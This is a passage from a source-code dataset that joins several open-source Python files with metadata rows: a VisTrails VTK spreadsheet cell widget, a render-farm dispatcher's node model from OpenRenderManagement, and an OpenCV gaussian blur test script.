QtCore.Qt.Key_P:"p",
QtCore.Qt.Key_Q:"q",
QtCore.Qt.Key_R:"r",
QtCore.Qt.Key_S:"s",
QtCore.Qt.Key_T:"t",
QtCore.Qt.Key_U:"u",
QtCore.Qt.Key_V:"v",
QtCore.Qt.Key_W:"w",
QtCore.Qt.Key_X:"x",
QtCore.Qt.Key_Y:"y",
QtCore.Qt.Key_Z:"z",
QtCore.Qt.Key_Asterisk:"asterisk",
QtCore.Qt.Key_Plus:"plus",
QtCore.Qt.Key_Minus:"minus",
QtCore.Qt.Key_Period:"period",
QtCore.Qt.Key_Slash:"slash",
QtCore.Qt.Key_F1:"F1",
QtCore.Qt.Key_F2:"F2",
QtCore.Qt.Key_F3:"F3",
QtCore.Qt.Key_F4:"F4",
QtCore.Qt.Key_F5:"F5",
QtCore.Qt.Key_F6:"F6",
QtCore.Qt.Key_F7:"F7",
QtCore.Qt.Key_F8:"F8",
QtCore.Qt.Key_F9:"F9",
QtCore.Qt.Key_F10:"F10",
QtCore.Qt.Key_F11:"F11",
QtCore.Qt.Key_F12:"F12",
QtCore.Qt.Key_F13:"F13",
QtCore.Qt.Key_F14:"F14",
QtCore.Qt.Key_F15:"F15",
QtCore.Qt.Key_F16:"F16",
QtCore.Qt.Key_F17:"F17",
QtCore.Qt.Key_F18:"F18",
QtCore.Qt.Key_F19:"F19",
QtCore.Qt.Key_F20:"F20",
QtCore.Qt.Key_F21:"F21",
QtCore.Qt.Key_F22:"F22",
QtCore.Qt.Key_F23:"F23",
QtCore.Qt.Key_F24:"F24",
QtCore.Qt.Key_NumLock:"Num_Lock",
QtCore.Qt.Key_ScrollLock:"Scroll_Lock"}
if i in handler:
return handler[i]
else:
return "None"
def getRendererList(self):
""" getRendererList() -> list
Return a list of vtkRenderer running in this QVTKViewWidget
"""
result = []
renWin = self.GetRenderWindow()
renderers = renWin.GetRenderers()
renderers.InitTraversal()
for i in xrange(renderers.GetNumberOfItems()):
result.append(renderers.GetNextItem())
return result
def getActiveRenderer(self, iren):
""" getActiveRenderer(iren: vtkRenderWindowwInteractor) -> vtkRenderer
Return the active vtkRenderer under mouse
"""
epos = list(iren.GetEventPosition())
if epos[1]<0:
epos[1] = -epos[1]
rens = iren.GetRenderWindow().GetRenderers()
rens.InitTraversal()
for i in xrange(rens.GetNumberOfItems()):
ren = rens.GetNextItem()
if ren.IsInViewport(epos[0], epos[1]):
return ren
return None
def findSheetTabWidget(self):
""" findSheetTabWidget() -> QTabWidget
Find and return the sheet tab widget
"""
p = self.parent()
while p:
if hasattr(p, 'isSheetTabWidget'):
if p.isSheetTabWidget()==True:
return p
p = p.parent()
return None
def getRenderersInCellList(self, sheet, cells):
""" isRendererIn(sheet: spreadsheet.StandardWidgetSheet,
cells: [(int,int)]) -> bool
Get the list of renderers in side a list of (row, column)
cells.
"""
rens = []
for (row, col) in cells:
cell = sheet.getCell(row, col)
if hasattr(cell, 'getRendererList'):
rens += cell.getRendererList()
return rens
def getSelectedCellWidgets(self):
sheet = self.findSheetTabWidget()
if sheet:
iren = self.mRenWin.GetInteractor()
ren = self.interacting
if not ren: ren = self.getActiveRenderer(iren)
if ren:
cells = sheet.getSelectedLocations()
if (ren in self.getRenderersInCellList(sheet, cells)):
return [sheet.getCell(row, col)
for (row, col) in cells
if hasattr(sheet.getCell(row, col),
'getRendererList')]
return []
def interactionEvent(self, istyle, name):
""" interactionEvent(istyle: vtkInteractorStyle, name: str) -> None
Make sure interactions sync across selected renderers
"""
if name=='MouseWheelForwardEvent':
istyle.OnMouseWheelForward()
if name=='MouseWheelBackwardEvent':
istyle.OnMouseWheelBackward()
ren = self.interacting
if not ren:
ren = self.getActiveRenderer(istyle.GetInteractor())
if ren:
cam = ren.GetActiveCamera()
cpos = cam.GetPosition()
cfol = cam.GetFocalPoint()
cup = cam.GetViewUp()
for cell in self.getSelectedCellWidgets():
if cell!=self and hasattr(cell, 'getRendererList'):
rens = cell.getRendererList()
for r in rens:
if r!=ren:
dcam = r.GetActiveCamera()
dcam.SetPosition(cpos)
dcam.SetFocalPoint(cfol)
dcam.SetViewUp(cup)
r.ResetCameraClippingRange()
cell.update()
def charEvent(self, istyle, name):
""" charEvent(istyle: vtkInteractorStyle, name: str) -> None
Make sure key presses also sync across selected renderers
"""
iren = istyle.GetInteractor()
ren = self.interacting
if not ren: ren = self.getActiveRenderer(iren)
if ren:
keyCode = iren.GetKeyCode()
if keyCode in ['w','W','s','S','r','R','p','P']:
for cell in self.getSelectedCellWidgets():
if hasattr(cell, 'GetInteractor'):
selectedIren = cell.GetInteractor()
selectedIren.SetKeyCode(keyCode)
selectedIren.GetInteractorStyle().OnChar()
selectedIren.Render()
istyle.OnChar()
def saveToPNG(self, filename):
""" saveToPNG(filename: str) -> filename or vtkUnsignedCharArray
Save the current widget contents to an image file. If
str==None, then it returns the vtkUnsignedCharArray containing
the PNG image. Otherwise, the filename is returned.
"""
w2i = vtk.vtkWindowToImageFilter()
w2i.ReadFrontBufferOff()
w2i.SetInput(self.mRenWin)
# Render twice to get a clean image on the back buffer
self.mRenWin.Render()
self.mRenWin.Render()
w2i.Update()
writer = vtk.vtkPNGWriter()
writer.SetInputConnection(w2i.GetOutputPort())
if filename!=None:
writer.SetFileName(filename)
else:
writer.WriteToMemoryOn()
writer.Write()
if filename:
return filename
else:
return writer.GetResult()
def captureWindow(self):
""" captureWindow() -> None
Capture the window contents to file
"""
fn = QtGui.QFileDialog.getSaveFileName(None,
"Save file as...",
"screenshot.png",
"Images (*.png)")
if fn.isNull():
return
self.saveToPNG(str(fn))
def grabWindowPixmap(self):
""" grabWindowImage() -> QPixmap
Widget special grabbing function
"""
uchar = self.saveToPNG(None)
ba = QtCore.QByteArray()
buf = QtCore.QBuffer(ba)
buf.open(QtCore.QIODevice.WriteOnly)
for i in xrange(uchar.GetNumberOfTuples()):
c = uchar.GetValue(i)
buf.putChar(chr(c))
buf.close()
pixmap = QtGui.QPixmap()
pixmap.loadFromData(ba, 'PNG')
return pixmap
def dumpToFile(self, filename):
"""dumpToFile() -> None
Dumps itself as an image to a file, calling saveToPNG
"""
self.saveToPNG(filename)
class QVTKViewWidgetCapture(QtGui.QAction):
"""
QVTKViewWidgetCapture is the action to capture the vtk rendering
window to an image
"""
def __init__(self, parent=None):
""" QVTKViewWidgetCapture(parent: QWidget) -> QVTKViewWidgetCapture
Setup the image, status tip, etc. of the action
"""
QtGui.QAction.__init__(self,
QtGui.QIcon(":/images/camera.png"),
"&Capture image to file",
parent)
self.setStatusTip("Capture the rendered image to a file")
def triggeredSlot(self, checked=False):
""" toggledSlot(checked: boolean) -> None
Execute the action when the button is clicked
"""
cellWidget = self.toolBar.getSnappedWidget()
cellWidget.captureWindow()
class QVTKViewWidgetSaveCamera(QtGui.QAction):
"""
QVTKViewWidgetSaveCamera is the action to capture the current camera
of the vtk renderers and save it back to the pipeline
"""
def __init__(self, parent=None):
""" QVTKViewWidgetSaveCamera(parent: QWidget) -> QVTKViewWidgetSaveCamera
Setup the image, status tip, etc. of the action
"""
QtGui.QAction.__init__(self,
"Save &Camera",
parent)
self.setStatusTip("Save current camera views to the pipeline")
def setCamera(self, controller):
ops = []
pipeline = controller.current_pipeline
cellWidget = self.toolBar.getSnappedWidget()
renderers = cellWidget.getRendererList()
for ren in renderers:
cam = ren.GetActiveCamera()
cpos = cam.GetPosition()
cfol = cam.GetFocalPoint()
cup = cam.GetViewUp()
rendererId = cellWidget.renderer_maps[ren]
# Looking for SetActiveCamera()
camera = None
renderer = pipeline.modules[rendererId]
for c in pipeline.connections.values():
if c.destination.moduleId==rendererId:
if c.destination.name=='SetActiveCamera':
camera = pipeline.modules[c.source.moduleId]
break
if not camera:
# Create camera
vtk_package = 'edu.utah.sci.vistrails.vtk'
camera = controller.create_module(vtk_package, 'vtkCamera', '',
0.0, 0.0)
ops.append(('add', camera))
# Connect camera to renderer
camera_conn = controller.create_connection(camera, 'self',
renderer,
'SetActiveCamera')
ops.append(('add', camera_conn))
# update functions
def convert_to_str(arglist):
new_arglist = []
for arg in arglist:
new_arglist.append(str(arg))
return new_arglist
functions = [('SetPosition', convert_to_str(cpos)),
('SetFocalPoint', convert_to_str(cfol)),
('SetViewUp', convert_to_str(cup))]
ops.extend(controller.update_functions_ops(camera, functions))
action = core.db.action.create_action(ops)
controller.add_new_action(action)
controller.perform_action(action)
controller.select_latest_version()
def triggeredSlot(self, checked=False):
""" toggledSlot(checked: boolean) -> None
Execute the action when the button is clicked
"""
visApp = QtCore.QCoreApplication.instance()
if hasattr(visApp, 'builderWindow'):
builderWindow = visApp.builderWindow
if builderWindow:
info = self.toolBar.sheet.getCellPipelineInfo(
self.toolBar.row, self.toolBar.col)
if info:
info = info[0]
viewManager = builderWindow.viewManager
view = viewManager.ensureVistrail(info['locator'])
if view:
controller = view.controller
controller.change_selected_version(info['version'])
self.setCamera(controller)
class QVTKViewWidgetToolBar(QCellToolBar):
"""
QVTKViewWidgetToolBar derives from QCellToolBar to give the VTKViewCell
a customizable toolbar
"""
def createToolBar(self):
""" createToolBar() -> None
This will get call initiallly to add customizable widgets
"""
self.appendAction(QVTKViewWidgetCapture(self))
self.addAnimationButtons()
self.appendAction(QVTKViewWidgetSaveCamera(self))
def registerSelf():
""" registerSelf() -> None
Registry module with the registry
"""
identifier = 'edu.utah.sci.vistrails.vtk'
registry = get_module_registry()
registry.add_module(VTKViewCell)
registry.add_input_port(VTKViewCell, "Location", CellLocation)
import core.debug
for (port,module) in [("SetRenderView",'vtkRenderView')]:
try:
registry.add_input_port(VTKViewCell, port,'(%s:%s)'%(identifier,module))
except Exception, e:
core.debug.warning(str(e))
registry.add_output_port(VTKViewCell, "self", VTKViewCell)
|
CMUSV-VisTrails/WorkflowRecommendation
|
vistrails/packages/vtk/vtkviewcell.py
|
Python
|
bsd-3-clause
| 39,509
|
[
"VTK"
] |
be43547bc1db115c2af2ec8743bd0a6874e4f152b72b1784248053f3ee730c3b
|
from time import time
from collections import defaultdict
from weakref import WeakKeyDictionary
from octopus.dispatcher.model.enums import *
from octopus.dispatcher.model import Task
from . import models
import logging
LOGGER = logging.getLogger("main.dispatcher.dispatchtree")
class NoRenderNodeAvailable(BaseException):
'''Raised to interrupt the dispatch iteration on an entry point node.'''
class NoLicenseAvailableForTask(BaseException):
'''Raised to interrupt the dispatch iteration on an entry point node.'''
class DependencyListField(models.Field):
def to_json(self, node):
return [[dep.id, statusList] for (dep, statusList) in node.dependencies]
class PoolShareDictField(models.Field):
def to_json(self, instance):
return [[poolShare.id, poolShare.pool.name] for poolShare in instance.poolShares.values()]
class AdditionnalPoolShareDictField(models.Field):
def to_json(self, instance):
return [[ps.id, ps.pool.name] for ps in instance.additionnalPoolShares.values()]
class FolderNodeChildrenField(models.Field):
def to_json(self, instance):
return [child.id for child in instance.children]
class BaseNode(models.Model):
dispatcher = None
name = models.StringField()
parent = models.ModelField(allow_null=True)
user = models.StringField()
priority = models.IntegerField()
dispatchKey = models.FloatField()
maxRN = models.IntegerField()
updateTime = models.FloatField()
poolShares = PoolShareDictField()
additionnalPoolShares = AdditionnalPoolShareDictField()
completion = models.FloatField()
status = models.IntegerField()
creationTime = models.FloatField()
startTime = models.FloatField(allow_null=True)
updateTime = models.FloatField(allow_null=True)
endTime = models.FloatField(allow_null=True)
dependencies = DependencyListField()
averageTimeByFrame = models.FloatField(allow_null=True)
minTimeByFrame = models.FloatField(allow_null=True)
maxTimeByFrame = models.FloatField(allow_null=True)
timer = models.FloatField(allow_null=True)
@property
def tags(self):
return {}
def __init__(self, id, name, parent, user, priority, dispatchKey, maxRN,
creationTime=None, startTime=None,
updateTime=None, endTime=None,
status=NODE_READY):
'''
Base class for each node in dispatcher tree structure. Holds main model
fields.
:param id int: unique id for this node
:param name str: a short string describing this node
:param parent: a FolderNode or None if this node is a root node
:param priority int: priority value
:param dispatchKey int: dispatchKey value
:param maxRN int: maximum number of render nodes that can be allocated to this tree node
:param creationTime: timestamp indicating when the node was created
:param startTime: timestamp indicating when the node was started
:param updateTime: timestamp indicating when the node was updated
:param endTime: timestamp indicating when the node was ended
:param status int: current node's status
'''
if not self.dispatcher:
from octopus.dispatcher.dispatcher import Dispatcher
self.dispatcher = Dispatcher(None)
self.__dict__['parent'] = None
models.Model.__init__(self)
self.id = int(id) if id is not None else None
self.name = str(name)
self.parent = parent
self.user = str(user)
self.priority = int(priority)
self.dispatchKey = int(dispatchKey)
self.maxRN = int(maxRN)
self.optimalMaxRN = 0
self.allocatedRN = 0
self.poolShares = WeakKeyDictionary()
self.additionnalPoolShares = WeakKeyDictionary()
self.completion = 1.0
self.status = status
self.creationTime = time() if not creationTime else creationTime
self.startTime = startTime
self.updateTime = updateTime
self.endTime = endTime
self.dependencies = []
self.reverseDependencies = []
self.lastDependenciesSatisfaction = False
self.lastDependenciesSatisfactionDispatchCycle = -1
self.readyCommandCount = 0
self.doneCommandCount = 0
self.commandCount = 0
self.averageTimeByFrameList = []
self.averageTimeByFrame = 0.0
self.minTimeByFrame = 0.0
self.maxTimeByFrame = 0.0
self.timer = None
def mainPoolShare(self):
return self.poolShares.values()[0]
def mainPool(self):
return self.poolShares.keys()[0]
def to_json(self):
base = super(BaseNode, self).to_json()
base["allocatedRN"] = self.allocatedRN
base["optimalMaxRN"] = self.optimalMaxRN
base["tags"] = self.tags.copy()
base["readyCommandCount"] = self.readyCommandCount
base["doneCommandCount"] = self.doneCommandCount
base["commandCount"] = self.commandCount
return base
def addDependency(self, node, acceptedStatus):
# TODO dependencies should be set for restricted node statutes only: DONE, ERROR and CANCELED
if not acceptedStatus:
return
if self is node:
# skip dependencies on oneself
return
self.status = NODE_BLOCKED
val = [node, acceptedStatus]
if not val in self.dependencies:
self.dependencies.append(val)
if self not in node.reverseDependencies:
node.reverseDependencies.append(self)
def checkDependenciesSatisfaction(self):
# TODO dependencies should be set for restricted node statutes only: DONE, ERROR and CANCELED
if self.dispatcher.cycle == self.lastDependenciesSatisfactionDispatchCycle:
return self.lastDependenciesSatisfaction
self.lastDependenciesSatisfaction = True
self.lastDependenciesSatisfactionDispatchCycle = self.dispatcher.cycle
for node, acceptedStatus in self.dependencies:
if node.status not in acceptedStatus:
self.lastDependenciesSatisfaction = False
break
else:
if self.parent is not None:
self.lastDependenciesSatisfaction = self.parent.checkDependenciesSatisfaction()
return self.lastDependenciesSatisfaction
def __new__(cls, *args, **kwargs):
# Remove optional attributes for __new__ call, not supported, but the attributes are still transmitter via super hierarchy
obj = super(BaseNode, cls).__new__(cls)
obj._parent_value = None
obj.invalidated = True
return obj
def __setattr__(self, name, value):
if name == 'parent':
self.setParentValue(value)
super(BaseNode, self).__setattr__(name, value)
def setParentValue(self, parent):
if self.parent is parent:
return
if self.parent:
self.parent.removeChild(self, False)
if parent:
parent.addChild(self, False)
self.__dict__['parent'] = parent
def dispatchIterator(self):
raise NotImplementedError
def updateAllocation(self):
'''
Called by subclasses during updateCompletion process to store maxRN and allocatedRN in the node.
maxRN is also updated during webservice on user requests, this is a bit of a redefinition since it shouldn't change programmatically.
'''
# Need to iterate over all poolshares concerning the current node.
# Otherwise we only update the allocatedRN of current pool (node the right value when user has changed pool during render)
# nodeSharesList = [poolshare for poolshare in self.dispatcher.dispatchTree.poolShares.values() if poolshare.node.id == self.id and poolshare.node.status in [NODE_RUNNING, NODE_ERROR, NODE_PAUSED] ]
# self.allocatedRN = 0
# for currPoolShare in nodeSharesList:
# self.maxRN = currPoolShare.maxRN
# self.allocatedRN += currPoolShare.allocatedRN
# Correct way, iterate over active poolshare and additionnal poolshares only
self.allocatedRN = 0
for currPoolShare in self.poolShares.values():
self.maxRN = currPoolShare.maxRN
self.allocatedRN += currPoolShare.allocatedRN
for ps in self.additionnalPoolShares.values():
self.allocatedRN += ps.allocatedRN
def updateCompletionAndStatus(self):
raise NotImplementedError
def __repr__(self):
nodes = [self]
parent = self.parent
while parent is not None:
nodes.insert(0, parent)
parent = parent.parent
names = [node.name for node in nodes]
return "<Node name='%s' path='/%s'>" % (self.name, "/".join(names))
def __str__(self):
return "%s: maxRN=%d allocatedRN=%d" % (self.name, self.maxRN, self.allocatedRN)
parent_value = property(lambda self: self._parent_value, setParentValue)
def invalidate(self):
self.invalidated = True
while self.parent and not self.parent.invalidated:
self.parent.invalidated = True
self = self.parent
class FolderNode(BaseNode):
strategy = models.StrategyField()
taskGroup = models.ModelField(allow_null=True)
children = FolderNodeChildrenField()
@property
def tags(self):
return self.taskGroup.tags if self.taskGroup else {}
##
# @param id an integer, unique for this node
# @param name a short string describing this folder
# @param parent a FolderNode or None if this node is a root node
# @param priority an integer priority value
# @param dispatchKey a floating-point dispatchKey value
# @param maxRN an integer value representing the maximum number of render
# nodes that can be allocated to this tree node.
# @param allocator a DispatchStrategy object
#
def __init__(self, id, name, parent, user, priority, dispatchKey, maxRN, strategy, creationTime=None, startTime=None, updateTime=None, endTime=None, status=NODE_DONE, taskGroup=None):
BaseNode.__init__(self, id, name, parent, user, priority, dispatchKey, maxRN, creationTime, startTime, updateTime, endTime, status)
self.children = []
self.strategy = strategy
self.taskGroup = taskGroup
if taskGroup is not None:
self.timer = taskGroup.timer
def addChild(self, child, setParent=True):
if child.parent is not self and setParent:
child.parent = self
else:
self.children.append(child)
self.fireChildAddedEvent(child)
def removeChild(self, child, setParent=True):
if child.parent is self and setParent:
child.parent = None
else:
self.children.remove(child)
self.fireChildRemovedEvent(child)
def fireChildAddedEvent(self, child):
self.invalidate()
for l in self.changeListeners:
try:
l.onChildAddedEvent(self, child)
except AttributeError:
pass
def fireChildRemovedEvent(self, child):
self.invalidate()
for l in self.changeListeners:
try:
l.onChildRemovedEvent(self, child)
except AttributeError:
pass
def cmdIterator(self):
for child in self.children:
for command in child.cmdIterator():
yield command
# if pCascadeUpdate:
# for dependingNode in self.reverseDependencies:
# dependingNode.setStatus( pStatus, pCascadeUpdate )
# for child in self.children:
# child.setStatus(pStatus, pCascadeUpdate)
# self.status = pStatus
# return True
##
# @return yields (node, command) tuples
#
def dispatchIterator(self, stopFunc, ep=None):
if ep is None:
ep = self
if self.readyCommandCount == 0:
return
self.strategy.update(self, ep)
for child in self.children:
try:
# PRA: only the TaskNode.dispatchIterator() may raise NoRenderNodeAvailable or NoLicenseAvailableForTask
for assignment in child.dispatchIterator(stopFunc, ep):
node, command = assignment
self.strategy.on_assignment(self, child, node)
yield assignment
# If no render node available for a command, all the commands of the parent tasks will not find a RN
except NoRenderNodeAvailable:
return
# Lack of licence is specific to a command, so we continue to iterate through the graph
except NoLicenseAvailableForTask:
LOGGER.info("Missing license for node \"%s\" (other commands can start anyway)." % self.name)
continue
# We should stop if stopFunction is reached
if stopFunc():
return
def updateCompletionAndStatus(self):
"""
Evaluate new value for completion and status of a particular FolderNode
"""
self.updateAllocation()
if not self.invalidated:
return
if not self.children:
completion = 1.0
status = NODE_DONE
else:
# Getting completion info
self.readyCommandCount = 0
self.doneCommandCount = 0
self.commandCount = 0
completion = 0.0
status = defaultdict(int)
for child in self.children:
child.updateCompletionAndStatus()
completion += child.completion
status[child.status] += 1
self.readyCommandCount += child.readyCommandCount
self.doneCommandCount += child.doneCommandCount
self.commandCount += child.commandCount
if hasattr(self, "commandCount") and int(self.commandCount) != 0:
self.completion = self.doneCommandCount / float(self.commandCount)
else:
# LOGGER.warning("Warning: a folder node without \"commandCount\" value was found -> %s" % self.name )
self.completion = completion / len(self.children)
# Updating node's overall status
if NODE_PAUSED in status:
self.status = NODE_PAUSED
elif NODE_ERROR in status:
self.status = NODE_ERROR
elif NODE_RUNNING in status:
self.status = NODE_RUNNING
elif NODE_READY in status:
self.status = NODE_READY
elif NODE_BLOCKED in status:
self.status = NODE_BLOCKED
elif NODE_CANCELED in status:
self.status = NODE_CANCELED
else:
# all commands are DONE, ensure the completion is at 1.0 (in case of failed completion update from some workers)
self.completion = 1.0
self.status = NODE_DONE
# Updating timers
times = [childNode.creationTime for childNode in self.children if childNode.creationTime is not None]
if times:
self.creationTime = min(times)
if self.taskGroup and (self.taskGroup.creationTime is None or self.taskGroup.creationTime > self.creationTime):
self.taskGroup.creationTime = self.creationTime
times = [childNode.startTime for childNode in self.children if childNode.startTime is not None]
if times:
self.startTime = min(times)
if self.taskGroup and (self.taskGroup.startTime is None or self.taskGroup.startTime > self.startTime):
self.taskGroup.startTime = self.startTime
times = [childNode.updateTime for childNode in self.children if childNode.updateTime is not None]
if times:
self.updateTime = max(times)
if self.taskGroup and (self.taskGroup.updateTime is None or self.taskGroup.updateTime > self.updateTime):
self.taskGroup.updateTime = self.updateTime
if isFinalNodeStatus(self.status):
times = [childNode.endTime for childNode in self.children if childNode.endTime is not None]
if times:
self.endTime = max(times)
if self.taskGroup and (self.taskGroup.endTime is None or
self.taskGroup.endTime > self.taskGroup.endTime):
self.taskGroup.endTime = self.endTime
else:
self.endTime = None
if self.taskGroup:
self.taskGroup.endTime = None
self.invalidated = False
if self.taskGroup:
self.timer = self.taskGroup.timer
# FIXME: suboptimal... lazy update someday ?
self.taskGroup.updateStatusAndCompletion()
def setPaused(self, paused):
for child in self.children:
child.setPaused(paused)
def resetCompletion(self):
self.completion = 0
for child in self.children:
child.resetCompletion()
def setStatus(self, pStatus, pCascadeUpdate=False):
'''
| Propagates a target status update request.
| @see doc/design/node-status-update.txt
:param pStatus: New status value to assign to the current node
:param pCascadeUpdate: Flag indicating if the depending nodes need to be updated in cascade
'''
if pCascadeUpdate:
for dependingNode in self.reverseDependencies:
dependingNode.setStatus(pStatus, pCascadeUpdate)
for child in self.children:
child.setStatus(pStatus, pCascadeUpdate)
self.status = pStatus
return True
def setMaxAttempt(self, maxAttempt):
'''
'''
globalResult = True
for child in self.children:
res = child.setMaxAttempt(maxAttempt)
if res is False:
globalResult = False
self.dispatcher.dispatchTree.toModifyElements.append(self)
return globalResult
class TaskNode(BaseNode):
task = models.ModelField()
paused = models.BooleanField()
maxAttempt = models.IntegerField()
@property
def tags(self):
if self.task is not None:
return self.task.tags
return None
def __init__(self, id, name, parent, user, priority, dispatchKey, maxRN, task, creationTime=None, startTime=None, updateTime=None, endTime=None, status=NODE_BLOCKED, paused=False, maxAttempt=1):
'''
:param id: an integer, unique for this node
:param name: a short string describing this folder
:param parent: a FolderNode or None if this node is a root node
:param priority: an integer priority value
:param dispatchKey: a floating-point dispatchKey value
:param maxRN: an integer value representing the maximum number of render
nodes that can be allocated to this tree node.
:param task: a Task object
'''
BaseNode.__init__(self, id, name, parent, user, priority, dispatchKey, maxRN, creationTime, startTime, updateTime, endTime, status)
self.task = task
self.paused = paused
self.maxAttempt = int(maxAttempt)
self.commmandCount = 0
if task is not None:
self.timer = task.timer
self.maxAttempt = int(task.maxAttempt)
self.commandCount = len(task.commands)
def cmdIterator(self):
for command in self.task.commands:
yield command
def dispatchIterator(self, stopFunc, ep=None):
# PRA : we don't use the stop function here ...
if ep is None:
ep = self
# Return if no readyCommand or job in pause
if self.readyCommandCount == 0:
return
if self.paused:
return
# ensure we are treating the commands in the order they arrived
sorted(self.task.commands, key=lambda x: x.id)
for command in self.task.commands:
if command.status != CMD_READY:
continue
# PRA : search a render node to assign command
renderNode = self.reserve_rendernode(command, ep)
# PRA : renderNode is None if we did not found a RN that match job contraints
if not renderNode:
# PRA : Requirements depends on the task (and not the command)
# So if we don't find a RN for a command, we would not find one for the command related to the same task
return
# Decrease the number of ready commands through the hierarchy
self.readyCommandCount -= 1
tmp_ep = ep
while tmp_ep:
tmp_ep.readyCommandCount -= 1
tmp_ep = tmp_ep.parent
yield (renderNode, command)
def reserve_rendernode(self, command, ep):
'''
:param command:
:returns: renderNode assigned to command
None if no RNs found due to constraints
'''
if ep is None:
ep = self
for poolshare in [poolShare for poolShare in ep.poolShares.values() if poolShare.hasRenderNodesAvailable()]:
# first, sort the rendernodes according their performance value
rnList = sorted(poolshare.pool.renderNodes, key=lambda rn: rn.performance, reverse=True)
for rendernode in rnList:
if rendernode.isAvailable() and rendernode.canRun(command):
if rendernode.reserveLicense(command, self.dispatcher.licenseManager):
rendernode.addAssignment(command)
return rendernode
else:
raise NoLicenseAvailableForTask
# Might not be necessary anymore because first loop is based on poolShare's hasRNSavailable method
# It was not taking into account the tests before assignment: RN.canRun()
if not [poolShare for poolShare in ep.poolShares.values() if poolShare.hasRenderNodesAvailable()]:
raise NoRenderNodeAvailable
return None
def updateCompletionAndStatus(self):
'''
Evaluate new value for completion and status of a particular TaskNode
'''
self.updateAllocation()
if not self.invalidated:
return
if self.task is None:
self.status = NODE_CANCELED
return
completion = 0.0
status = defaultdict(int)
self.readyCommandCount = 0
self.doneCommandCount = 0
self.commandCount = len(self.task.commands)
for command in self.task.commands:
completion += command.completion
status[command.status] += 1
if command.status == CMD_READY:
self.readyCommandCount += 1
if command.status == CMD_DONE:
self.doneCommandCount += 1
if self.task.commands:
self.completion = completion / len(self.task.commands)
else:
self.completion = 1.0
if CMD_CANCELED in status:
self.status = NODE_CANCELED
elif self.paused:
self.status = NODE_PAUSED
elif CMD_ERROR in status:
self.status = NODE_ERROR
elif CMD_TIMEOUT in status:
self.status = NODE_ERROR
elif CMD_RUNNING in status:
self.status = NODE_RUNNING
elif CMD_ASSIGNED in status:
self.status = NODE_READY
elif CMD_FINISHING in status:
self.status = NODE_RUNNING
elif CMD_READY in status:
self.status = NODE_READY
elif CMD_BLOCKED in status:
self.status = NODE_BLOCKED
else:
# all commands are DONE, ensure the completion is at 1.0 (in case of failed completion update from some workers)
self.completion = 1.0
self.status = NODE_DONE
times = [command.creationTime for command in self.task.commands if command.creationTime is not None]
if times:
self.creationTime = min(times)
times = [command.startTime for command in self.task.commands if command.startTime is not None]
if times:
self.startTime = min(times)
times = [command.updateTime for command in self.task.commands if command.updateTime is not None]
if times:
self.updateTime = max(times)
# only set the endTime on the node if it's done
if self.status == NODE_DONE:
times = [command.endTime for command in self.task.commands if command.endTime is not None]
if times:
self.endTime = max(times)
else:
self.endTime = None
self.task.status = self.status
self.task.completion = self.completion
self.task.creationTime = self.creationTime
self.task.startTime = self.startTime
self.task.updateTime = self.updateTime
self.task.endTime = self.endTime
self.timer = self.task.timer
self.invalidated = False
def checkDependenciesSatisfaction(self):
# TODO dependencies should be set for restricted node statutes only: DONE, ERROR and CANCELED
taskNodes = [taskNode
for taskNode in self.dispatcher.dispatchTree.nodes.values()
if isinstance(taskNode, TaskNode) and taskNode.task == self.task]
return all(BaseNode.checkDependenciesSatisfaction(taskNode) for taskNode in taskNodes)
def setPaused(self, paused):
# pause every job not done
if self.status != NODE_DONE:
self.paused = paused
if self.status == NODE_PAUSED and not paused:
self.status = NODE_READY
self.invalidate()
def setMaxAttempt(self, maxAttempt):
'''
'''
if not isinstance(self.task, Task):
return False
# Update node's task if exists
self.task.maxAttempt = maxAttempt
# Update node
self.maxAttempt = maxAttempt
self.dispatcher.dispatchTree.toModifyElements.append(self.task)
self.dispatcher.dispatchTree.toModifyElements.append(self)
return True
def resetCompletion(self):
self.completion = 0
for command in self.task.commands:
command.completion = 0
def setStatus(self, pStatus, pCascadeUpdate=False):
'''
| Update commands in order to reach the required status.
| If proper param is given, depending node will receive the same status.
:param pStatus: New status value to assign to the current node
:param pCascadeUpdate: Flag indicating if the depending node need to be updated in cascade
'''
if pCascadeUpdate:
for dependingNode in self.reverseDependencies:
dependingNode.setStatus(pStatus, pCascadeUpdate)
if pStatus == NODE_CANCELED and self.status != NODE_DONE:
for command in self.task.commands:
command.cancel()
elif pStatus == NODE_READY and self.status != NODE_RUNNING:
if any(isRunningStatus(command.status) for command in self.task.commands):
return False
for command in self.task.commands:
command.setReadyStatus()
elif pStatus in (NODE_DONE, NODE_ERROR, NODE_BLOCKED, NODE_RUNNING):
return False
return True
|
mikrosimage/OpenRenderManagement
|
src/octopus/dispatcher/model/node.py
|
Python
|
bsd-3-clause
| 27,782
|
[
"Octopus"
] |
04d55b91a41018adb7a97b0c0a384bea7eab08b3418c2e142afebb15a18fda82
|
#! /usr/bin/env python
import cv2
import numpy as np
import matplotlib.pyplot as plt
import time
from image_processor import *
print (TCOLORS.PURPLE + "Unit Test: Applying a Gaussian Blure on an image" + TCOLORS.NORMAL)
SIGMA = 1
ENVELOPE_SIZE = 5
img = cv2.imread(FILENAME)
gray = rgb2gray(img)
width = len(gray)
height = len(gray[0])
print "Image Width: %d Image Height: %d" % (len(gray), len(gray[0]))
print "Sigma: %d" % SIGMA
print "Envelope Size: %d" % ENVELOPE_SIZE
print "Generating Gaussian Envelope...",
start_time = time.time()
gaussian_envelope = gen_deviation_array(SIGMA, ENVELOPE_SIZE)
elapsed_time = time.time() - start_time
print "Done: Elapsed Time: %.3f" % elapsed_time
print "Gaussian Envelope: %s" % str(gaussian_envelope)
print "Using Open CV to apply gaussian blur...",
start_time = time.time()
blur = cv2.GaussianBlur(gray,(SIGMA,SIGMA),0)
elapsed_time = time.time() - start_time
print "Done: Elapsed Time: %.3f" % elapsed_time
print "Using custom algorithm to apply gaussian blur...",
start_time = time.time()
gaussian_blure = two_d_gaussian_blure(gray, gaussian_envelope)
elapsed_time = time.time() - start_time
print "Done: Elapsed Time: %.3f" % elapsed_time
fig = plt.figure()
a=fig.add_subplot(1,3,1)
plt.title("Original")
plt.imshow(gray, cmap='Greys_r')
a=fig.add_subplot(1,3,2)
plt.title("Opencv Gaussian Blur")
plt.imshow(blur, cmap='Greys_r')
a=fig.add_subplot(1,3,3)
plt.title("Gaussian Blur")
plt.imshow(gaussian_blure, cmap='Greys_r')
plt.show()
|
CospanDesign/python
|
image_processor/gaussian_image_test.py
|
Python
|
mit
| 1,500
|
[
"Gaussian"
] |
7e841ddde03b30a1c56e8bdaccda8013a35af7b1b47ac27c8a160ef63289a52c
|
# Copyright (c) Pymatgen Development Team.
